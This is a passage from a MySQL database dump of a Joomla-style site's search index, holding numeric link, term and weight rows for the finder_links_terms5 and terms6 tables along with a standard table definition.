4721,1603404,1.14331),(4721,1603405,0.18669),(4909,1603405,0.18669),(4938,1603405,0.18669),(4721,1603406,0.98),(4721,1603407,1.12),(4721,1603408,0.23331),(4721,1603409,1.26),(4721,1603410,1.33),(4721,1603411,0.56),(4721,1603412,0.88669),(4721,1603413,1.07331),(4721,1603414,1.12),(4721,1603415,1.19),(4721,1603416,0.32669),(4721,1603417,0.91),(4721,1603418,1.12),(4721,1603921,0.09331),(4940,1603921,0.09331),(4734,1603921,0.18662),(4721,1603922,0.86331),(4721,1603923,1.07331),(4721,1603924,0.28),(4734,1603924,0.56),(4924,1603924,0.68),(4721,1603925,0.98),(4721,1603926,1.14331),(4721,1603927,0.88669),(4721,1603928,1.07331),(4721,1603929,1.07331),(4721,1603930,0.88669),(4721,1603931,1.07331),(4721,1603932,0.98),(4721,1603933,1.07331),(4721,1603934,1.00331),(4721,1603935,1.07331),(4721,1603936,0.98),(4721,1603937,1.09669),(4721,1603938,2.43661),(4721,1603939,2.77661),(4721,1603940,0.93331),(4721,1603941,1.16669),(4721,1603942,0.91),(4721,1603943,1.00331),(4721,1603944,0.18669),(4721,1603945,0.98),(4721,1603946,1.28331),(4721,1603947,0.09331),(4721,1603948,0.81669),(4721,1603949,0.95669),(4721,1603950,0.14),(4721,1603951,0.91),(4721,1603952,1.14331),(4721,1603953,0.32669),(4721,1603954,0.91),(4721,1603955,1.09669),(4721,1603956,0.09331),(4734,1603956,0.27993),(4721,1603957,0.79331),(4721,1603958,0.93331),(4721,1603959,0.23331),(4734,1603959,0.23331),(4940,1603959,0.23331),(4721,1603960,0.95669),(4721,1603961,1.12),(4721,1603962,0.56),(4721,1603963,1.28331),(4721,1603964,1.4),(4721,1603965,0.18669),(4909,1603965,0.18669),(4721,1603966,0.86331),(4721,1603967,0.98),(4777,1603968,0.18669),(4940,1603968,0.18669),(4721,1603968,0.37338),(4734,1603968,0.74676),(4721,1603969,0.93331),(4721,1603970,1.07331),(4721,1603971,0.86331),(4721,1603972,1.00331),(4721,1603973,0.32669),(4917,1603973,0.32669),(4721,1603974,1.12),(4721,1603975,1.21331),(4727,1605080,0.79339),(4727,1605081,2.55),(4727,1605082,3.00339),(4732,1613371,0.18669),(4732,1613372,1.00331),(4732,1613373,1.14331),(4761,1613374,0.42),(4732,1613374,0.84),(4732,1613375,0.95669),(4732,1613376,1.09669),(4732,1613377,0.95669),(4732,1613378,1.19),(4732,1613379,0.23331),(4732,1613380,1.05),(4732,1613381,1.30669),(4761,1613496,0.93338),(4732,1613496,1.13339),(4761,1613497,1.96),(4732,1613497,2.38),(4761,1613498,2.38),(4732,1613498,2.89),(4732,1613499,0.95669),(4732,1613500,1.16669),(4732,1613501,0.37331),(4761,1613501,0.37331),(4732,1613502,1.09669),(4732,1613503,1.35331),(4732,1613504,0.46669),(4732,1613505,1.19),(4732,1613506,1.4),(4732,1613507,0.37331),(4732,1613508,1.05),(4732,1613509,1.35331),(4732,1613510,0.32669),(4732,1613511,1.02669),(4732,1613512,1.23669),(4732,1613513,0.42),(4732,1613514,1.05),(4732,1613515,1.28331),(4734,1615892,0.56),(4734,1615893,1.30669),(4734,1615894,1.4),(4734,1615895,0.37331),(4734,1615896,1.09669),(4734,1615897,1.14331),(4734,1615898,0.37331),(4734,1615899,1.14331),(4734,1615900,1.21331),(4734,1615901,0.22661),(4734,1615902,1.98339),(4734,1615903,2.49339),(4734,1615904,0.95669),(4734,1615905,1.21331),(4734,1615906,0.95669),(4734,1615907,1.12),(4734,1615908,0.84),(4734,1615909,1.07331),(4734,1615910,0.81669),(4734,1615911,0.88669),(4734,1615912,0.56),(4734,1615913,1.14331),(4734,1615914,1.23669),(4734,1616565,0.84),(4734,1616566,0.98),(4734,1616567,1.00331),(4734,1616568,0.91),(4734,1616569,1.19),(4734,1616570,1.00331),(4734,1616571,1.16669),(4734,1616572,0.79331),(4734,1616573,0.91),(4734,1616574,0.79331),(4734,1616575,0.86331),(4734,1616576,1.00331),(4734,1616577,1.21331),(4734,1616578,0.95669),(4734,1616579,1.21331),(4734,1616580,1.00331),(4734,1616581,1.07331),(4734,1616582,1.02669),(4734,1616583,1.19),(4734,1616584,0.37331),(4761,1616584,1.86655),(4734,1616585,1.14331),(4734,1616586,1.26),(4762,1616587,0.42),(4734,1616587,0.84),(4734,1616588,1.91338),(4734,1616589,2.33338),(4734,1616590,1.02669),(4734,1616591,1.23669),(4734,1616592,0.51331),(4734,1616593,1.09669),(4734,1616594,1.19),(4734,1616595,0.46669),(4734,1616596,1.05),(4734,1616597,1.21331),(4734,1616598,0.42),(4734,1616599,1.16669),(4734,1616600,1.4),(4734,1616601,0.51331),(4734,1616602,1.07331),(4734,1616603,1.23669),(4734,1616604,0.37331),(4734,1616605,1.07331),(4734,1616606,1.23669),(4734,1616607,0.23331),(4734,1616608,0.93331),(4734,1616609,1.19),(4734,1616610,0.23331),(4777,1616610,0.23331),(4734,1616611,0.98),(4734,1616612,1.02669),(4734,1616613,0.23331),(4734,1616614,0.93331),(4734,1616615,1.16669),(4734,1616616,1.00331),(4734,1616617,1.12),(4734,1616618,1.00331),(4734,1616619,1.16669),(4734,1616620,0.95669),(4734,1616621,1.19),(4734,1616622,0.65338),(4734,1616623,0.91),(4734,1616624,1.14331),(4734,1616625,0.91),(4734,1616626,1.02669),(4734,1616627,0.98007),(4734,1616628,1.05),(4734,1616629,1.26),(4734,1616630,1.07331),(4734,1616631,1.23669),(4734,1616632,1.12),(4734,1616633,1.37669),(4734,1616634,0.32669),(4909,1616634,0.32669),(4734,1616635,0.93331),(4734,1616636,1.00331),(4734,1616637,0.32669),(4734,1616638,0.93331),(4734,1616639,1.14331),(4734,1616640,0.18669),(4734,1616641,1.02669),(4734,1616642,1.14331),(4734,1616643,1.16669),(4734,1616644,0.28),(4734,1616645,0.91),(4734,1616646,1.21331),(4734,1616647,0.42),(4734,1616648,0.95669),(4734,1616649,1.14331),(4734,1616650,0.42),(4734,1616651,1.07331),(4734,1616652,1.28331),(4734,1616653,0.32669),(4734,1616654,1.00331),(4734,1616655,1.07331),(4734,1616656,0.23331),(4734,1616657,0.98),(4734,1616658,1.02669),(4734,1616659,0.23331),(4734,1616660,0.93331),(4734,1616661,1.14331),(4734,1616662,0.32669),(4734,1616663,0.91),(4734,1616664,1.16669),(4734,1616665,0.23331),(4734,1616666,0.93331),(4734,1616667,1.21331),(4734,1616668,0.69993),(4734,1616669,1.23669),(4734,1616670,1.28331),(4734,1616671,0.98),(4734,1616672,1.23669),(4734,1616673,1.05),(4734,1616674,1.23669),(4734,1616675,0.32669),(4734,1616676,1.07331),(4734,1616677,1.33),(4734,1616678,0.23331),(4734,1616679,0.93331),(4734,1616680,1.07331),(4734,1617509,0.86331),(4734,1617510,1.09669),(4734,1617511,0.84),(4734,1617512,0.98),(4734,1617513,0.98),(4734,1617514,1.16669),(4734,1617515,0.91),(4734,1617516,1.00331),(4734,1617517,1.07331),(4734,1617518,1.23669),(4734,1617519,0.84),(4734,1617520,1.14331),(4749,1617521,0.14),(4851,1617521,0.14),(4917,1617521,0.14),(4734,1617521,0.62),(4734,1617522,0.84),(4734,1617523,0.98),(4734,1617524,2.95992),(4734,1617525,3.36),(4734,1617526,0.18669),(4940,1617526,0.18669),(4734,1617527,1.02669),(4734,1617528,1.14331),(4734,1617529,0.23331),(4734,1617530,0.98),(4734,1617531,1.05),(4734,1617532,0.28),(4734,1617533,1.02669),(4734,1617534,1.26),(4734,1617535,0.23331),(4927,1617535,0.79992),(4734,1617536,0.98),(4734,1617537,1.05),(4734,1617538,0.28),(4849,1617538,0.28),(4734,1617539,1.00331),(4734,1617540,1.12),(4734,1617541,0.93331),(4734,1617542,1.00331),(4734,1617543,0.81669),(4734,1617544,0.98),(4734,1617545,0.88669),(4734,1617546,1.14331),(4734,1617547,0.91),(4734,1617548,1.07331),(4734,1617549,0.88669),(4734,1617550,1.07331),(4734,1617551,0.88669),(4734,1617552,1.09669),(4734,1617553,0.14),(4927,1617553,0.14),(4734,1617554,1.05),(4734,1617555,1.19),(4734,1617556,0.95669),(4734,1617557,1.09669),(4734,1617558,0.93331),(4734,1617559,1.00331),(4734,1617560,0.86331),(4734,1617561,0.93331),(4734,1617562,0.84),(4734,1617563,0.91),(4734,1617564,0.51331),(4734,1617565,1.19),(4734,1617566,1.4),(4734,1617567,0.23331),(4734,1617568,0.88669),(4734,1617569,1.09669),(4734,1617570,0.42),(4734,1617571,1.05),(4734,1617572,1.14331),(4762,1620259,1.53993),(4761,1620259,3.07986),(4762,1620260,3.78),(4761,1620260,7.56),(4762,1620523,1.09669),(4761,1620523,2.19338),(4762,1620524,1.33),(4761,1620524,2.66),(4761,1620542,1.12014),(4762,1620542,3.17373),(4761,1620543,0.86331),(4762,1620543,0.86331),(4762,1620959,0.14),(4761,1620959,1.12),(4741,1621238,1.21331),(4749,1621238,1.21331),(4753,1621238,1.21331),(4851,1621238,1.21331),(4852,1621238,1.21331),(4741,1621239,1.4),(4749,1621239,1.4),(4753,1621239,1.4),(4851,1621239,1.4),(4852,1621239,1.4),(4749,1623507,0.86331),(4851,1623507,0.86331),(4749,1623508,0.93331),(4749,1623526,0.81669),(4851,1623526,0.81669),(4749,1623527,1.00331),(4851,1623527,1.00331),(4753,1623634,0.81669),(4753,1623635,1.00331),(4753,1623639,0.23331),(4847,1623639,0.23331),(4753,1623640,0.86331),(4753,1623641,1.12),(4753,1623642,0.56661),(4753,1623643,2.15339),(4753,1623644,2.43661),(4761,1626291,2.98704),(4761,1626292,7.56),(4761,1626293,1.00331),(4761,1626294,1.02669),(4761,1626295,1.07331),(4761,1626296,1.09669),(4761,1626297,1.07331),(4761,1626298,1.09669),(4761,1626299,1.14331),(4761,1626300,1.00331),(4761,1626301,1.02669),(4761,1626302,3.36),(4761,1626303,1.00331),(4761,1626304,1.00331),(4761,1626305,1.05),(4761,1626306,1.05),(4761,1626307,0.84),(4761,1626308,1.05),(4761,1626309,2.05338),(4761,1626310,2.38),(4761,1626311,1.16669),(4761,1626312,1.35331),(4761,1626313,0.51331),(4761,1626314,1.14331),(4761,1626315,1.35331),(4761,1626316,1.37669),(4761,1626317,1.30669),(4761,1626318,1.4),(4761,1626319,1.4),(4761,1626320,1.4),(4761,1626321,1.35331),(4761,1626689,0.46662),(4761,1626690,1.00331),(4761,1626691,1.19),(4761,1626692,1.05),(4761,1626693,1.35331),(4761,1626694,1.14331),(4761,1626695,1.35331),(4761,1626696,1.12),(4761,1626697,1.28331),(4761,1626698,1.14331),(4761,1626699,1.28331),(4761,1626700,1.14331),(4761,1626701,1.33),(4761,1626702,1.09669),(4761,1626703,1.21331),(4761,1626704,1.05),(4761,1626705,1.23669),(4761,1626706,0.28),(4761,1626707,1.07331),(4761,1626708,1.33),(4761,1626709,1.05),(4761,1626710,1.30669),(4761,1626711,0.28),(4761,1626712,1.07331),(4761,1626713,1.33),(4761,1626714,0.23331),(4761,1626715,1.02669),(4761,1626716,1.16669),(4761,1626717,0.37331),(4761,1626718,1.09669),(4761,1626719,1.23669),(4761,1626720,0.42),(4761,1626721,1.09669),(4761,1626722,1.35331),(4761,1626723,0.65338),(4761,1626724,2.24),(4761,1626725,2.61338),(4761,1626726,0.37331),(4940,1626726,0.37331),(4761,1626727,1.07331),(4761,1626728,1.30669),(4761,1626729,0.46669),(4761,1626730,1.23669),(4761,1626731,1.28331),(4761,1626732,0.65331),(4761,1626733,1.33),(4761,1626734,1.4),(4761,1626735,20.0208),(4761,1626736,1.16669),(4761,1626737,1.4),(4761,1626738,35.0941),(4761,1626739,42.6774),(4761,1626740,1.33),(4761,1626741,0.7),(4761,1626742,1.35331),(4761,1626743,1.4),(4761,1626744,0.42),(4761,1626745,1.23669),(4761,1626746,1.33),(4761,1626747,0.46669),(4761,1626748,1.09669),(4761,1626749,1.35331),(4761,1626750,0.09331),(4761,1626751,0.98),(4761,1626752,1.19),(4761,1626753,1.00331),(4761,1626754,0.91),(4761,1626755,0.98),(4761,1626756,1.02669),(4761,1626757,1.21331),(4761,1626758,0.95669),(4761,1626759,1.16669),(4761,1626760,1.77338),(4761,1626761,1.05),(4761,1626762,1.07331),(4761,1627355,0.28),(4761,1627356,1.05),(4761,1627357,1.19),(4761,1627358,0.14),(4761,1627359,0.84),(4761,1627360,0.95669),(4761,1627361,0.42),(4761,1627362,1.05),(4761,1627363,1.28331),(4761,1627364,0.42),(4761,1627365,1.26),(4761,1627366,1.4),(4761,1627367,1.26),(4761,1627368,2.94),(4761,1627369,3.42993),(4761,1627370,0.95669),(4761,1627371,1.16669),(4761,1627372,0.91),(4761,1627373,1.21331),(4761,1627374,1.00331),(4761,1627375,1.21331),(4761,1627376,1.07331),(4761,1627377,1.28331),(4761,1627378,0.93331),(4761,1627379,1.14331),(4761,1627380,2.87007),(4761,1627381,1.16669),(4761,1627382,1.19),(4761,1627383,1.19),(4762,1628074,1.30669),(4762,1628075,2.8),(4762,1628282,1.26),(4762,1628283,3.50007),(4762,1628284,3.78),(4762,1628285,0.51331),(4762,1628286,1.05),(4762,1628287,1.26),(4762,1628288,0.42),(4762,1628289,0.95669),(4762,1628290,1.19),(4762,1628291,1.00331),(4762,1628292,1.33),(4762,1628293,0.14),(4762,1628294,1.05),(4762,1628295,1.19),(4762,1628296,0.46669),(4762,1628297,1.09669),(4762,1628298,1.30669),(4762,1628299,0.46669),(4762,1628300,1.16669),(4762,1628301,1.37669),(4762,1628302,0.37331),(4762,1628303,1.21331),(4762,1628304,1.4),(4762,1628305,1.00331),(4762,1628306,8.4),(4762,1628307,9.89352),(4762,1628308,8.4),(4762,1628309,9.89352),(4762,1628310,0.93331),(4762,1628311,1.14331),(4762,1628610,0.09338),(4762,1628611,0.77),(4762,1628612,0.91),(4762,1628613,0.77),(4762,1628614,0.91),(4762,1628615,0.56),(4762,1628616,1.05),(4762,1628617,1.28331),(4762,1628618,1.02669),(4762,1628619,1.26),(4762,1628620,0.23331),(4762,1628621,1.07331),(4762,1628622,1.16669),(4762,1628623,0.86331),(4762,1628624,1.00331),(4766,1629123,0.90661),(4777,1629368,0.32669),(4777,1629369,0.91),(4777,1629370,1.05),(4777,1629371,0.65338),(4777,1629372,1.05),(4777,1629373,1.21331),(4777,1629374,0.98),(4777,1629375,1.19),(4777,1629531,0.98),(4777,1629532,1.05),(4777,1629533,0.23331),(4777,1629534,1.07331),(4777,1629535,1.23669),(4777,1629536,0.37331),(4777,1629537,1.05),(4777,1629538,1.23669),(4777,1629539,0.32669),(4777,1629540,1.02669),(4777,1629541,1.37669),(4777,1629542,0.32669),(4777,1629543,0.93331),(4777,1629544,1.09669),(4777,1629545,0.86331),(4777,1629546,0.93331),(4777,1629547,0.37331),(4777,1629548,1.09669),(4777,1629549,1.23669),(4777,1629550,0.32669),(4777,1629551,1.02669),(4777,1629552,1.21331),(4777,1629553,0.28),(4777,1629554,1.02669),(4777,1629555,1.16669),(4777,1629556,0.18669),(4777,1629557,1.05),(4777,1629558,1.30669),(4777,1629559,0.23331),(4777,1629560,0.95669),(4777,1629561,1.00331),(4777,1629562,0.18669),(4777,1629563,1.09669),(4777,1629564,1.26),(4777,1629743,0.88669),(4777,1629744,1.09669),(4777,1629745,1.07331),(4777,1629746,1.28331),(4777,1629747,0.86331),(4777,1629748,1.09669),(4777,1629749,0.60669),(4777,1629750,1.12),(4777,1629751,1.4),(4777,1629752,0.32669),(4777,1629753,1.12),(4777,1629754,1.30669),(4798,1643409,1.14331),(4798,1643410,1.19),(4798,1643411,0.23331),(4798,1643412,0.91),(4798,1643413,1.16669),(4798,1643414,0.42),(4798,1643415,0.95669),(4798,1643416,1.28331),(4798,1643417,0.93331),(4798,1643418,0.98),(4798,1643419,0.46669),(4798,1643420,0.98),(4798,1643421,1.28331),(4798,1643422,0.28),(4798,1643423,1.12),(4798,1643424,1.33),(4798,1643425,0.60669),(4798,1643426,1.33),(4798,1643427,1.4),(4798,1643428,1.07331),(4798,1643429,1.14331),(4798,1643430,0.93331),(4798,1643431,1.21331),(4798,1643432,0.60669),(4798,1643433,1.23669),(4798,1643434,1.4),(4798,1643435,0.23331),(4798,1643436,0.91),(4798,1643437,0.98),(4798,1643438,0.14),(4798,1643439,0.88669),(4798,1643440,1.14331),(4798,1643441,0.37338),(4798,1643442,2.05338),(4798,1643443,1.35331),(4798,1643444,1.4),(4798,1643766,0.88669),(4798,1643767,1.14331),(4798,1643768,0.14),(4798,1643769,0.84),(4798,1643770,0.98),(4798,1643771,1.30676),(4798,1643772,0.95669),(4798,1643773,1.07331),(4798,1643774,1.05),(4798,1643775,1.14331),(4798,1643776,1.82),(4798,1643777,2.05338),(4803,1644937,0.51331),(4803,1644938,1.14331),(4803,1644939,1.28331),(4803,1644940,0.79339),(4803,1644941,2.60661),(4803,1644942,2.77661),(4803,1645018,0.88669),(4803,1645019,0.95669),(4803,1645020,0.32669),(4803,1645021,1.00331),(4803,1645022,1.23669),(4803,1645023,0.37331),(4803,1645024,0.93331),(4803,1645025,1.09669),(4803,1645107,1.02669),(4803,1645108,1.16669),(4803,1645109,0.93331),(4803,1645110,1.14331),(4803,1645111,0.23331),(4909,1645111,0.23331),(4803,1645112,0.98),(4803,1645113,1.07331),(4804,1645184,0.56661),(4804,1645185,2.43661),(4804,1645186,2.77661),(4809,1645399,0.56661),(4809,1645400,2.15339),(4809,1645401,2.55),(4809,1645405,2.21),(4839,1646592,0.45339),(4847,1646592,0.45339),(4839,1646593,1.21331),(4847,1646593,1.21331),(4857,1646593,1.21331),(4839,1646594,0.51331),(4839,1646595,1.09669),(4839,1646596,1.21331),(4839,1646597,0.46669),(4847,1646597,0.46669),(4857,1646597,0.46669),(4839,1646598,1.14331),(4847,1646598,1.14331),(4857,1646598,1.14331),(4839,1646599,1.33),(4847,1646599,1.33),(4857,1646599,1.33),(4839,1646620,0.14),(4839,1646621,0.91),(4839,1646622,1.16669),(4847,1646863,2.38),(4847,1646864,2.77661),(4847,1646865,0.98),(4847,1646866,1.02669),(4849,1646960,0.46669),(4849,1646961,1.23669),(4849,1646962,1.35331),(4849,1646963,0.18669),(4849,1646964,0.98),(4849,1646965,1.05),(4849,1646966,0.56),(4849,1646967,0.95669),(4849,1646968,1.16669),(4849,1646969,0.91),(4849,1646970,1.09669),(4849,1646971,0.56),(4849,1646972,1.12),(4849,1646973,1.16669),(4849,1646974,0.60669),(4849,1646975,1.14331),(4849,1646976,1.37669),(4849,1647115,0.32669),(4849,1647116,0.91),(4849,1647117,1.07331),(4849,1647118,0.37331),(4849,1647119,1.16669),(4849,1647120,1.21331),(4849,1647121,0.51331),(4849,1647122,1.05),(4849,1647123,1.16669),(4849,1647124,0.74662),(4849,1647125,1.16669),(4849,1647126,1.26),(4849,1647127,1.09669),(4849,1647128,1.4),(4849,1647129,0.51331),(4849,1647130,1.21331),(4849,1647131,1.28331),(4849,1647132,1.86655),(4849,1647133,1.00331),(4849,1647134,1.05),(4849,1647135,1.07331),(4849,1647136,1.19),(4849,1647137,1.02669),(4849,1647138,1.14331),(4849,1647139,1.02669),(4849,1647140,1.14331),(4849,1647141,1.12),(4849,1647142,1.19),(4849,1647143,0.46669),(4849,1647144,1.07331),(4849,1647145,1.21331),(4849,1647354,1.07331),(4849,1647355,1.21331),(4849,1647356,0.95669),(4849,1647357,1.23669),(4849,1647358,0.23331),(4927,1647358,0.23331),(4849,1647359,0.95669),(4927,1647359,0.95669),(4849,1647360,1.14331),(4849,1647361,1.07331),(4849,1647362,1.26),(4849,1647363,0.18669),(4849,1647364,1.00331),(4849,1647365,1.09669),(4849,1647366,0.42),(4927,1647366,0.42),(4849,1647367,1.05),(4849,1647368,1.30669),(4849,1647369,0.42),(4849,1647370,1.14331),(4849,1647371,1.4),(4849,1647372,1.09669),(4849,1647373,1.23669),(4849,1647374,0.23331),(4849,1647375,0.98),(4849,1647376,1.05),(4851,1647984,0.93331),(4852,1648069,0.93331),(4852,1648070,1.00331),(4909,1672220,0.28),(4909,1672221,1.02669),(4909,1672222,1.28331),(4909,1672223,1.24661),(4909,1672224,0.23331),(4909,1672225,1.02669),(4909,1672226,1.33),(4909,1672289,0.28),(4927,1672289,0.56),(4909,1672290,1.14331),(4909,1672291,1.35331),(4909,1672292,0.56),(4909,1672293,1.05),(4909,1672294,1.23669),(4909,1672295,1.07331),(4909,1672296,1.12),(4909,1672297,0.91),(4909,1672298,1.00331),(4909,1672422,0.91),(4909,1672423,1.21331),(4909,1672424,0.98),(4909,1672425,1.09669),(4909,1672426,0.46669),(4909,1672427,1.09669),(4909,1672428,1.14331),(4909,1672429,0.42),(4909,1672430,1.09669),(4909,1672431,1.30669),(4909,1672432,0.88669),(4909,1672433,1.02669),(4909,1672434,0.18669),(4909,1672435,0.93331),(4909,1672436,1.09669),(4909,1672437,0.56),(4909,1672438,1.19),(4909,1672439,1.30669),(4909,1672440,0.46669),(4909,1672441,0.98),(4909,1672442,1.05),(4909,1672443,0.42),(4909,1672444,0.95669),(4909,1672445,1.26),(4909,1672446,0.28),(4909,1672447,1.91338),(4909,1672448,1.09669),(4909,1672449,1.09669),(4909,1672450,0.95669),(4909,1672451,1.00331),(4917,1679100,1.00331),(4917,1679101,1.19),(4917,1679102,0.37331),(4917,1679103,0.95669),(4917,1679104,1.26),(4917,1679105,1.12),(4917,1679106,1.16669),(4917,1679107,1.02662),(4917,1679108,2.14662),(4917,1679109,1.23669),(4917,1679110,1.12),(4917,1679111,0.93338),(4917,1679112,1.23669),(4917,1679113,1.4),(4917,1679114,1.16669),(4917,1679115,1.37669),(4917,1679116,0.51331),(4917,1679117,1.12),(4917,1679118,1.19),(4917,1679295,0.81669),(4917,1679296,1.05),(4917,1679297,0.98),(4917,1679298,1.26),(4917,1679299,0.95669),(4917,1679300,1.05),(4917,1679301,0.46669),(4917,1679302,1.28331),(4917,1679303,1.4),(4917,1679304,1.00331),(4917,1679305,1.05),(4918,1679876,0.45339),(4918,1679877,2.21),(4924,1680573,2.09661),(4924,1680574,2.66339),(4924,1680582,2.38),(4924,1680583,2.94661),(4927,1682740,0.79992),(4927,1682741,1.05),(4927,1682742,1.30669),(4927,1682743,0.28),(4927,1682744,0.98),(4927,1682745,1.12),(4927,1682746,0.46669),(4927,1682747,1.07331),(4927,1682748,1.21331),(4927,1682749,2.1),(4927,1682750,5.6),(4927,1682751,1.21331),(4927,1682752,1.19),(4927,1682753,1.26),(4927,1682754,1.26),(4927,1682755,1.26),(4927,1682756,0.32669),(4927,1682757,1.05),(4927,1682758,1.09669),(4927,1682759,0.28),(4927,1682760,0.91),(4927,1682761,1.14331),(4927,1682762,0.28),(4927,1682763,0.98),(4927,1682764,1.21331),(4927,1682765,0.51331),(4927,1682766,1.07331),(4927,1682767,1.26),(4927,1682976,1.00331),(4927,1682977,1.05),(4927,1682978,1.00331),(4927,1682979,1.07331),(4927,1682980,0.14),(4927,1682981,0.86331),(4927,1682982,0.95669),(4927,1682983,0.37331),(4927,1682984,1.28331),(4927,1682985,1.4),(4927,1682986,0.42),(4927,1682987,0.95669),(4927,1682988,1.14331),(4927,1682989,0.28),(4927,1682990,0.88669),(4927,1682991,0.95669),(4927,1682992,0.28),(4927,1682993,1.09669),(4927,1682994,1.23669),(4927,1682995,1.11993),(4927,1682996,0.98),(4927,1682997,1.05),(4927,1682998,1.12),(4927,1682999,1.33),(4927,1683000,0.95669),(4927,1683001,1.19),(4927,1683002,0.23331),(4927,1683003,1.02669),(4927,1683004,1.26),(4927,1683005,0.32669),(4927,1683006,0.98),(4927,1683007,1.02669),(4927,1683179,1.02669),(4927,1683180,1.37669),(4927,1683181,1.05),(4927,1683182,1.09669),(4927,1683183,0.91),(4927,1683184,1.05),(4927,1683185,0.98),(4927,1683186,1.16669),(4927,1683187,0.98),(4927,1683188,1.05),(4927,1683189,1.09669),(4927,1683190,1.07331),(4927,1683191,1.16669),(4927,1683192,3.28008),(4927,1683193,3.76008),(4927,1683194,0.98),(4927,1683195,1.09669),(4927,1683196,0.14),(4927,1683197,0.86331),(4927,1683198,1.00331),(4927,1683199,0.98),(4927,1683200,1.14331),(4927,1683201,0.88669),(4927,1683202,1.14331),(4934,1683980,0.91),(4934,1683981,1.00331),(4938,1686303,0.28),(4938,1686304,1.02669),(4938,1686305,1.14331),(4938,1686306,1.05),(4938,1686307,1.35331),(4938,1686308,1.09669),(4938,1686309,1.14331),(4938,1686310,0.56),(4938,1686311,1.09669),(4938,1686312,1.21331),(4938,1686313,0.65338),(4938,1686314,0.95669),(4938,1686315,1.00331),(4938,1686316,0.98),(4938,1686317,1.19),(4938,1686318,1.26),(4940,1686318,1.26),(4938,1686319,1.33),(4938,1686320,1.00331),(4938,1686321,1.30669),(4938,1686322,0.42),(4938,1686323,1.05),(4938,1686324,1.30669),(4938,1686325,0.18669),(4940,1686325,0.45339),(4938,1686326,0.91),(4938,1686327,0.98),(4938,1686553,1.00331),(4938,1686554,1.09669),(4938,1686555,1.02669),(4938,1686556,1.28331),(4938,1686557,0.23331),(4938,1686558,1.12),(4938,1686559,1.4),(4938,1686560,0.28),(4938,1686561,0.88669),(4938,1686562,0.93331),(4940,1688226,0.79339),(4940,1688227,2.38),(4940,1688383,2.21),(4940,1688384,2.72),(4940,1688385,0.32669),(4940,1688386,0.91),(4940,1688387,1.16669),(4940,1688388,0.42),(4940,1688389,1.07331),(4940,1688390,1.28331),(4940,1688391,0.42),(4940,1688392,1.16669),(4940,1688393,1.23669),(4940,1688394,1.14331),(4940,1688395,1.21331),(4940,1688396,1.35331),(4940,1688397,1.05),(4940,1688398,1.23669),(4940,1688399,0.46669),(4940,1688400,1.16669),(4940,1688401,1.4),(4940,1688644,0.95669),(4940,1688645,1.12),(4940,1688646,0.95669),(4940,1688647,1.12),(4940,1688648,0.88669),(4940,1688649,1.12),(4940,1688650,0.93331),(4940,1688651,1.16669),(4940,1688652,0.23331),(4940,1688653,1.05),(4940,1688654,1.12),(4940,1688655,0.98),(4940,1688656,1.14331),(4940,1688657,1.05),(4940,1688658,1.12),(4940,1688659,0.28),(4940,1688660,0.95669),(4940,1688661,1.16669),(4940,1688662,0.14),(4940,1688663,0.84),(4940,1688664,0.91),(4940,1688665,1.00331),(4940,1688666,1.05),(4940,1688667,1.02669),(4940,1688668,1.12),(4940,1688669,0.14),(4940,1688670,0.91),(4940,1688671,1.14331),(4946,1689277,0.90661),(4949,1689277,0.90661),(4947,1689300,1.02),(4947,1689301,2.55),(4949,1689351,2.49339),(4955,1689481,1.02),(4955,1689482,2.83339);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms6`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms6`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms6` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms6`
--

LOCK TABLES `fw3gt_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms6` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms6` VALUES (4723,1523593,0.5334),(4764,1523593,0.5334),(4723,1523594,2.8),(4764,1523594,2.8),(4723,1523595,3),(4764,1523595,3),(4723,1523596,1.2),(4764,1523596,1.2),(4850,1523596,2.4),(4723,1523597,2.9334),(4764,1523597,2.9334),(4723,1523598,3.2666),(4764,1523598,3.2666),(4552,1523932,0.32669),(4669,1523932,0.32669),(4755,1523932,0.56004),(4741,1523932,0.65338),(4552,1523933,0.95669),(4755,1523933,1.64004),(4552,1523934,1.05),(4755,1523934,1.8),(4569,1524765,1.0666),(4569,1524766,3.1334),(4569,1524767,3.7334),(4672,1525149,1.6),(4593,1527359,0.4),(4593,1527360,2.6),(4593,1527361,2.9334),(4604,1535979,0.51331),(4604,1535980,1.23669),(4604,1535981,1.4),(4604,1535982,0.42),(4604,1535983,1.26),(4604,1535984,1.35331),(4616,1535985,0.46669),(4604,1535985,0.93338),(4604,1535986,2.05338),(4604,1535987,1.19),(4604,1535988,1.23669),(4604,1536453,0.37331),(4604,1536454,1.07331),(4604,1536455,1.16669),(4616,1547734,1.21331),(4616,1547735,1.4),(4616,1548045,0.28),(4616,1548046,1.05),(4616,1548047,1.37669),(4624,1553941,1.6),(4624,1553942,3),(4624,1553943,3.3334),(4625,1555449,0.32669),(4625,1555450,1.02669),(4625,1555451,1.4),(4625,1555452,0.46662),(4625,1555453,0.91),(4625,1555454,1.09669),(4625,1555455,0.91),(4625,1555456,1.14331),(4625,1555457,0.28),(4625,1555458,1.00331),(4625,1555459,1.07331),(4626,1556880,0.46669),(4626,1556881,1.09669),(4626,1556882,1.30669),(4669,1559017,0.93331),(4741,1559017,1.86662),(4669,1559018,1.00331),(4741,1559018,2.00662),(4669,1559019,0.8),(4741,1559019,0.8),(4806,1559019,0.8),(4851,1559019,1.6),(4857,1559019,1.6),(4669,1559020,3),(4741,1559020,3),(4806,1559020,3),(4851,1559020,6),(4653,1560575,0.6666),(4653,1560576,2.7334),(4653,1560577,3.2),(4653,1560578,0.9334),(4664,1560578,0.9334),(4732,1560578,0.9334),(4761,1560578,0.9334),(4653,1560579,3.0666),(4653,1560580,3.9334),(4653,1560581,1.0666),(4653,1560582,3),(4653,1560583,3.2),(4664,1563619,1.3334),(4732,1563619,1.3334),(4761,